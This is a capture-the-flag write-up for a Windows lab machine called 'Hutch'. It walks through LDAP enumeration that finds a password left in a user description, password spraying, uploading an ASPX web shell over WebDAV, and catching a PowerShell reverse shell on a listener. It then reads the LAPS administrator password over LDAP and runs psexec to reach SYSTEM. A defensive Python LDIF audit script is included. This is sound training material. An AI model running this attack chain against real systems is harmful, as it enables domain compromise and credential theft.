# Hutch

`ldap` `bloodhound.py` `kerberos` `laps`

* Machine name: Hutch
* Difficulty: Intermediate
* OS: Windows

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-03 08:23 EDT
Nmap scan report for 192.168.218.122
Host is up (0.038s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   Server Date: Sat, 03 Aug 2024 12:28:06 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-03 12:27:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49856/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

`(Domain: hutch.offsec0., Site: Default-First-Site-Name)`

We added `hutch.offsec` to the /etc/hosts file.

### LDAP (389)

We are going to extract usernames from LDAP.

```
┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)"
ldap_initialize( ldap://192.168.249.122:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
# extended LDIF
#
# LDAPv3
# base <DC=hutch,DC=offsec> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# hutch.offsec
dn: DC=hutch,DC=offsec

# Administrator, Users, hutch.offsec
dn: CN=Administrator,CN=Users,DC=hutch,DC=offsec

# Guest, Users, hutch.offsec
dn: CN=Guest,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
{...}
```

The output is very long, so we narrow it down by selecting only what interests us.

```
┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)" | grep sAMAccountName 
ldap_initialize( ldap://192.168.249.122:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
sAMAccountName: Guest
sAMAccountName: Domain Computers
sAMAccountName: Cert Publishers
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: Cloneable Domain Controllers
sAMAccountName: Protected Users
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: rplacidi
sAMAccountName: opatry
sAMAccountName: ltaunton
sAMAccountName: acostello
sAMAccountName: jsparwell
sAMAccountName: oknee
sAMAccountName: jmckendry
sAMAccountName: avictoria
sAMAccountName: jfrarey
sAMAccountName: eaburrow
sAMAccountName: cluddy
sAMAccountName: agitthouse
sAMAccountName: fmcsorley
```

Bingo! Now we can copy these usernames into a file. For example, we can use gedit and its find-and-replace function.

Let's see whether we can find any other important information...

```
┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)" | grep Password
ldap_initialize( ldap://192.168.249.122:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
badPasswordTime: 133672742592729828
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse
# Allowed RODC Password Replication Group, Users, hutch.offsec
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
cn: Allowed RODC Password Replication Group
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutc
name: Allowed RODC Password Replication Group
sAMAccountName: Allowed RODC Password Replication Group
# Denied RODC Password Replication Group, Users, hutch.offsec
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
cn: Denied RODC Password Replication Group
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch
name: Denied RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
badPasswordTime: 133672743850542338
badPasswordTime: 133672743948511044
badPasswordTime: 133672744026479793
badPasswordTime: 133672744107886055
badPasswordTime: 133672744190229807
badPasswordTime: 133672744288354825
badPasswordTime: 133672744357573563
badPasswordTime: 133672744449761061
badPasswordTime: 133672744527886082
badPasswordTime: 133672744602104827
badPasswordTime: 133672744674448546
badPasswordTime: 133672744751011084
description: Password set to CrabSharkJellyfish192 at user's request. Please c
badPasswordTime: 133672744830386057
```

So we have found a password.

### Kerberos (88)

```
┌──(kali㉿kali)-[~]
└─$ /usr/share/doc/python3-impacket/examples/GetNPUsers.py hutch.offsec/ -dc-ip 192.168.249.122 -usersfile hutch.txt -format hashcat -outputfile hashes.txt
{...}
[-] User jfrarey doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eaburrow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User cluddy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User agitthouse doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fmcsorley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
```

No hash was retrieved.

We will use the password found earlier.

```
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.249.122 -u hutch.txt -p "CrabSharkJellyfish192" --continue-on-success
SMB         192.168.249.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\Guest:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\rplacidi:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\opatry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\ltaunton:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\acostello:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\jsparwell:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\oknee:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\jmckendry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\avictoria:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\jfrarey:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\eaburrow:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\cluddy:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\agitthouse:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
```

The password belongs to fmcsorley!

## Initial access

### Cadaver (WebDAV)

We can connect to port 80 and upload a shell. We got this information from the nmap scan, where "POST" is allowed for WebDAV.

{% embed url="https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx" %}

```
┌──(kali㉿kali)-[~]
└─$ cadaver http://192.168.212.122/
Authentication required for 192.168.212.122 on server `192.168.212.122':
Username: fmcsorley
Password: 
dav:/> put cmdasp.aspx
Uploading cmdasp.aspx to `/cmdasp.aspx':
Progress: [=============================>] 100.0% of 1401 bytes succeeded.
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FKhrQPqIBAbsToYDUJ5iy%2F9a68eceb9cb46e3c21727d7d6f7fcf21.png?alt=media&#x26;token=dc720845-ec72-45f6-859a-b123964d18d6" alt=""><figcaption></figcaption></figure>

I copied the base64-encoded PowerShell reverse shell from:

{% embed url="https://www.revshells.com/" %}

Then I ran the command, with a listener waiting on my Kali machine.

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234   
listening on [any] 1234 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.212.122] 50095
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> 
```

## Privilege escalation

We can see that LAPS is installed.

```
PS C:\Program Files\LAPS> 

    Directory: C:\Program Files\LAPS\CSE
Mode                LastWriteTime         Length Name                       
----                -------------         ------ ----                       
-a----        9/22/2016   9:02 AM         148632 AdmPwd.dll    
```

We can abuse it by querying the LAPS password attribute over LDAP with fmcsorley's credentials.

```
┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -H 'ldap://192.168.212.122' -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <dc=hutch,dc=offsec> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd 
#

# HUTCHDC, Domain Controllers, hutch.offsec
dn: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec
ms-Mcs-AdmPwd: 0sxhC1%Om9UK(C

# search reference
ref: ldap://ForestDnsZones.hutch.offsec/DC=ForestDnsZones,DC=hutch,DC=offsec

# search reference
ref: ldap://DomainDnsZones.hutch.offsec/DC=DomainDnsZones,DC=hutch,DC=offsec

# search reference
ref: ldap://hutch.offsec/CN=Configuration,DC=hutch,DC=offsec

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3
```

What interests us: `ms-Mcs-AdmPwd: 0sxhC1%Om9UK(C`
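As an added example (not part of the original writeup), here is a Python audit a defender can run over an ldapsearch LDIF export to catch both findings above: credential-like text in free-text attributes such as description, and ms-Mcs-AdmPwd values being returned to a low-privileged bind, which means the LAPS read right is delegated too widely. It unfolds LDIF continuation lines, which is why the grep on this page only saw the first fragment of the description. The sample LDIF and its values are constructed placeholders.

```python
import re
# Constructed LDIF sample (placeholder values, not the box's real ones) mirroring
# this writeup's two findings: a password typed into a user's description, folded
# over two lines as ldapsearch does at 78 columns, and an ms-Mcs-AdmPwd value
# returned to a non-privileged LDAP bind.
SAMPLE_LDIF = """\
dn: CN=fmcsorley,CN=Users,DC=example,DC=test
sAMAccountName: fmcsorley
description: Password set to EXAMPLE-PLACEHOLDER at user's request. Please c
 hange it at next logon.

dn: CN=DC01,OU=Domain Controllers,DC=example,DC=test
sAMAccountName: DC01$
ms-Mcs-AdmPwd: EXAMPLE-LAPS-PLACEHOLDER
"""
PASSWORD_HINT = re.compile(r"\b(password|passwd|pwd|mot de passe)\b", re.I)

def parse_ldif(text):
    """Yield one {attribute: [values]} dict per entry, unfolding RFC 2849 continuation
    lines (leading space) that a plain grep cuts off. Attribute names are lower-cased."""
    entry, last_attr = {}, None
    for line in text.splitlines():
        if line.startswith("#"):            # ldapsearch comment lines
            continue
        if not line.strip():                # blank line terminates the entry
            if entry:
                yield entry
            entry, last_attr = {}, None
        elif line.startswith(" ") and last_attr:
            entry[last_attr][-1] += line[1:]
        else:
            attr, _, value = line.partition(":")
            last_attr = attr.lower()        # LDAP attribute names are case-insensitive
            # "::" marks a base64 value; it is left undecoded, which is enough for flagging
            entry.setdefault(last_attr, []).append(value.lstrip(": "))
    if entry:
        yield entry

def audit(text):
    """Return one finding per exposed secret, in entry order."""
    findings = []
    for e in parse_ldif(text):
        name = e.get("samaccountname", e.get("dn", ["?"]))[0]
        for attr in ("description", "info", "comment"):
            if any(PASSWORD_HINT.search(v) for v in e.get(attr, [])):
                findings.append(f"{name}: credential-like text in '{attr}'")
        if "ms-mcs-admpwd" in e:            # present only if the bind may read it
            findings.append(f"{name}: ms-Mcs-AdmPwd readable by the binding principal")
    return findings
```

Run it against a real export with `audit(open("dump.ldif").read())`; any ms-Mcs-AdmPwd hit obtained with an ordinary user's bind should be treated as a LAPS delegation misconfiguration to fix.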

We ran psexec:

```
┌──(kali㉿kali)-[~]
└─$ impacket-psexec administrator:'0sxhC1%Om9UK(C'@192.168.212.122
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.212.122.....
[*] Found writable share ADMIN$
[*] Uploading file LHBVafld.exe
[*] Opening SVCManager on 192.168.212.122.....
[*] Creating service hYKZ on 192.168.212.122.....
[*] Starting service hYKZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

We are nt authority\system!

There were other ways to finish the box; for example, it was possible to use PrintSpoofer (SeImpersonate privilege: enabled).
